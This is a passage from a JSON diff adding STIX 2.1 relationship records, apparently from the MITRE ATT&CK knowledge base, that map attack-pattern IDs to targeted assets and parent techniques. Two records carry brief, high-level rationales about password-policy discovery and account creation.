"external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--948fd95a-06c8-4833-9f95-abc141f86c8f", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--949177a1-f725-4a28-b5c7-9fb5a66a8be1", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--949a7ae0-b69e-4ff7-bc5f-e7be43cf86b4", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--94b5356f-dbca-4d46-a5f2-185bc68d9891", + "created": "2024-05-22T17:25:21.264Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:52:08.269Z", + "description": "Asset Mapping Rationale: Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Adversaries may also leverage a Network Device CLI on network devices to discover password policy information.", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--94c21669-2cf4-49ea-beaf-fb5f5b81a542", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--94deb50a-3b9a-4ccc-8396-071d5a8737cd", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--94ffb48a-8442-45e3-9701-1070b19031cd", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--950c7be9-c84d-4543-9f3b-71eae9019fe4", + "created": "2020-02-11T18:26:36.527Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd", + "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9529dc44-9a72-49b7-bfea-713356b0f55a", + "created": "2020-02-11T18:38:22.699Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "target_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9537d9c9-ba0d-42d9-b97d-3b28bfe265e6", + "created": "2024-04-09T20:47:47.280Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T20:47:47.280Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--955cad50-e2ca-43a9-965c-f0e38f7f0513", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--956bbc7f-82c2-4097-8b7b-1e9d732c532d", + "created": "2023-09-28T20:17:07.288Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:17:07.288Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9578c370-0ab8-40a3-b0c3-d7413d818995", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9598b09e-58e1-4235-85f4-c1cdc7fadf94", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--95a8763a-507c-4171-b2d0-f3860a881cdd", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--95c8dbc0-4850-4bf3-9fcb-afa43b2eb443", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--95e5c80b-fc95-4dcd-93b9-c40762c6cb23", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--95eeaa83-2c31-4e02-9959-484af3c5fce3", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--96575047-df79-4e74-9f88-44307a46bce0", + "created": "2020-03-09T14:38:24.631Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--967839f9-a3b8-4469-89c8-1e3ac3a1f1d2", + "created": "2024-05-22T15:35:27.035Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-22T15:35:27.035Z", + "description": "Asset Mapping Rationale: Adversaries may create an account to maintain access to victim systems.[1] With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", + "relationship_type": "targets", + "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--968fd463-fec4-4b2d-b3c9-950d8471b9a8", + "created": "2023-09-28T20:25:30.229Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:25:30.229Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--96956f5b-3839-4d37-b3b1-82b2890ee3f5", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--96a74c1c-f5bb-4011-bb7e-7564f48ea567", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--96addefa-d845-4af1-b59e-6aed14333943", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--96b750a4-d931-471d-bf7d-bace4fe85146", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--96bf3005-d31e-42ce-a543-cdcf3d4a56bd", + "created": "2020-01-17T16:15:20.106Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", + "target_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--96bf3d7e-6fbe-4e0b-b3e5-7712d14d4b1d", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--96c8bfa8-e5d9-48a9-8502-df63ce4893be", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3a32740a-11b0-4bcf-b0a9-3abd0f6d3cd5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--96d3ede9-e24b-4e85-be30-e64b9d5998db", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--96f5f245-a67b-4e3d-8d3f-ef2a7719a3fd", + "created": "2020-03-30T03:10:12.851Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--d54416bd-0803-41ca-870a-ce1af7c05638", + "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--970797d0-3e4a-4ab2-9958-61bb4ef60af5", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--971a1d76-a516-437e-a447-a558aee97eb9", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--973de2bd-f988-4aa0-9407-28d3838fd993", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--974e273b-848f-41fd-a691-3c23ebc01e7f", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--974ff726-56b3-4fc6-b074-aa2be0aa724b", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--976fb3d0-9227-4fd7-9bdb-4f4657cedf4d", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--976ffdd9-bc86-4bc6-80a0-736705f049f9", + "created": "2020-10-01T00:56:25.256Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9774fd36-2d85-4570-9f63-97f2d6c1ca6c", + "created": "2020-03-27T21:08:25.409Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + 